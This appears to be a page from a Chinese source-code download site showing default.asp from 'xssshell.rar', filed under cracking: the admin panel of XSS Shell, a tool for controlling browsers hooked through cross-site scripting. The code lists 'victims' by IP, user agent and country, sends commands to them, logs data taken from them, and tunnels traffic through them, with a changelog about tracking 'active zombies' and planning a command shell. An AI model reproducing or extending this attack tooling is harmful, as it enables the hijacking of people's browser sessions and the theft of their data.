开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > 系统/网络安全 > 破解 > 查看源码
default.asp
资源名称:xssshell.rar [点击查看]
上传用户:wangting
上传日期:2020-01-24
资源大小:2226k
文件大小:5k
源码类别:

破解

开发平台:

ASP/ASPX

default.asp:源码内容
  1. <%
  3. '09/08/2006
  4. ' - Started
  5. '
  6. ' 15/08/2006
  7. ' - Working alpha
  8. '
  9. '18/08/2006
  10. ' New UI
  11. '
  12. '31/10/2006
  13. ' Now supports activity and shows active zombies and drops non-active ones
  14. ' Multiple victim support with send and save
  15. ' Faster victim notification
  17. '01.04.2007
  18. ' - Logs replaced AttackID for XSS Tunnel compatibility
  21. ' TODO;
  22. ' - Log commands locally for analyze later
  23. ' + Build up connection interface 
  24. ' - Command Shell
  25. ' / Command Interface
  26. ' + Implement AJAX for interface (low pr)
  29. %>
  30. <!--#include file="db.asp" -->
  31. <%
  32. protected()
  34. Dim CallType
  35. CallType = fm_Qnstr("c")
  37. 'Call only logs
  38. Select Case CallType 
  39. Case 1
  40. Call Logs()
  42. Case 2
  43. Call Victims(False)
  45. Case 3 ' XSS Tunnel
  46. Call Victims(True)
  48. End Select
  50. '// Poor man's AJAX Calls
  51. If CallType > 0 Then Response.End
  53. Title = "XSS Shell Admin"
  55. %>
  56. <!--#include file="header.asp" -->
  57. <%
  58. Call ShowCommands()
  59. %>
  60. <div id="victims">
  61. <div id="victimsUpdater">
  62. <%Victims(False)%>
  63. </div>
  64. </div>
  65. <div id="logHolder">
  66. <h2>Logs</h2>
  67. <div id="log"></div>
  68. </div>
  70. <%
  71. Call Viewer()
  75. '---------------------------------------------------------------------------
  76. ' Helpers
  77. '---------------------------------------------------------------------------
  79. Sub Victims(ByVal XSSTunnel)
  81. Dim RsVic
  82. getRs RsVic, "SELECT TOP " & MAX_VICTIM & " Victim.IP, Victim.ID, Victim.VictimID, RequestTime, RawUserAgent, Data FROM Victim, VictimDetail WHERE VictimDetail.VictimID = Victim.VictimID AND lastseen >  DATEADD(""s"",-" & Activity & ",Now) ORDER BY Victim.ID DESC"
  85. If XSSTunnel Then 
  87. If Not RsVic.EOF And Not RsVic.BOF Then
  88. Response.Write fm_Encode(RsVic("VictimId"))
  90. Else
  91. Response.Write NO_RECORD
  92. End IF
  94. Response.End
  96. End If
  99. Response.Write "<h2>Victims</h2>" 
  100. Dim viclist, Starter
  102. While Not RsVic.EOF 
  104. PrintVictim(RsVic)
  105. If Starter Then viclist = viclist & ","
  106. viclist = viclist & fm_Encode(RsVic("VictimID"))
  108. Starter = True
  109. RsVic.MoveNext
  110. Wend
  112. Response.Write "[" & viclist
  114. fmKill RsVic
  116. End Sub
  118. Sub PrintVictim(ByVal Rs)
  120. Dim Data, ProxyData
  122. ProxyData = Rs("Data")
  123. If ProxyData <> "" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, "<br />")
  125. Data = Data & "<strong>Victim ID : </strong>" & fm_Encode(Rs("VictimID")) & "<br>"
  126. Data = Data & "<div class=code>" & fm_Encode(Rs("RawUserAgent")) & "</div>"
  127. If ProxyData <> "" Then Data = Data & "<div class=code>" & ProxyData & "</div>"
  129. Dim Checked 
  130. Checked = false
  132. With Response
  133. .Write "<div class=""commandl"" onmouseover=""hi(this)"" onmouseout=""lo(this)"" help=""" & Data & """ >"
  134. .Write "<img src=""mg/flags/" & GetCountry(Rs("IP")) & ".png"" alt=""" & GetCountry(Rs("IP")) & """ width=""20"" height=""13"" > "
  135. .Write Rs("IP") & " / " & fm_Encode(Rs("VictimID")) & "</div>"
  136. End With
  138. 'Response.Write "<ul><a href=""showdata.asp?i=" & Rs("ID") & "&m=1"">" & Rs("IP") & "</a> - <em>" & Rs("RequestTime") & "</em></ul>"
  139. End Sub
  142. ' COMMANDS BOX
  143. '---------------------------------------------------------------------------
  144. ' Show Available Commands
  146. Sub ShowCommands()
  148. %>
  149. <div id="commands">
  150. <h2>Commands</h2>
  151. <%
  152. Dim i
  153. For i = 0 To UBound(Commands) Step 3
  155. Response.Write "<div id=""cmd" & i & """ class=""commandl"" onmouseover=""hi(this)"" onmouseout=""lo(this)""><a href=""javascript:;"" onclick=""sendCommand('" & Commands(i+1) & "');new Effect.Highlight(document.getElementById('cmd" & i & "'), '#ff0000')"">" & fm_Encode(Commands(i)) & "</a><br>" & Commands(i+2) & "</div>"
  157. Next 
  158. %>
  159. <hr /><strong>Parameters :</strong> <br />
  160. <textarea name="params" id="params" style="width:98%;height:80px"></textarea>
  162. <input type="hidden" id="victims" value="" />
  163. <hr />
  164. </div>
  165. <%
  167. End Sub
  171. ' VIEWER BOX
  172. '---------------------------------------------------------------------------
  173. ' Offline Content Viewer iframe 
  175. Sub Viewer()
  177. %>
  178. <div id="offlinebrowser">
  179. <h2>Viewer</h2>
  180. <iframe name="offlinebrw" id="offlinebrw" src="javascript:document.write('.');document.close()"></iframe>
  181. </div>
  182. <%
  184. End Sub
  187. ' LOGS BOX
  188. '---------------------------------------------------------------------------
  189. ' Show recent logs from victims
  191. Sub Logs()
  193. Dim RsLog
  194. getRs RsLog, "SELECT TOP " & DEFAULT_REC & " ID, Data, Type, AttackID, Shown FROM Log ORDER BY ID DESC"
  197. ' Response.Write "<h2>Logs : " & Minute(Now) & ":" & Second(Now) & "</h2>"
  198. Response.Write "<ol>"
  200. While Not RsLog.EOF 
  202. PrintLog(RsLog)
  204. RsLog.MoveNext
  205. Wend
  207. Response.Write "</ol>"
  209. fmKill RsLog
  211. End Sub
  213. ' Print and Format Logs
  214. Function PrintLog(ByVal Rs)
  216. Dim Value 
  217. If Rs("Data") <> "" Then
  218. Value = fm_Encode(Rs("Data"))
  219. Value = Replace(Value, "%7Bn%7D", "<br />")
  220. Value = Replace(Value, "%3Atrue", "%3A<strong>true</strong>")
  222. Else
  223. Value = Rs("AttackID") & "..."
  225. End If
  227. Dim CSSname
  229. '// Pushed
  230. If Rs("Shown") = 1 Then
  231. CSSname = "pushed"
  232. End If
  234. If Rs("Data") <> "" Then
  235. CSSname = "done"
  236. End If
  240. Value = "<span class=""" & CSSName & """>" & Value & "</span>"
  242. If Rs("Type") = HTMLPAGE Then
  243. Value = "<a href=""showdata.asp?i=" & Rs("AttackID") & """ target=""offlinebrw"">HTML</a> - " & Rs("AttackID")
  244. End If
  246. Response.Write "<li>" & Value & "</li>"
  248. End Function
  250. %>
  252. <!--#include file="footer.asp" -->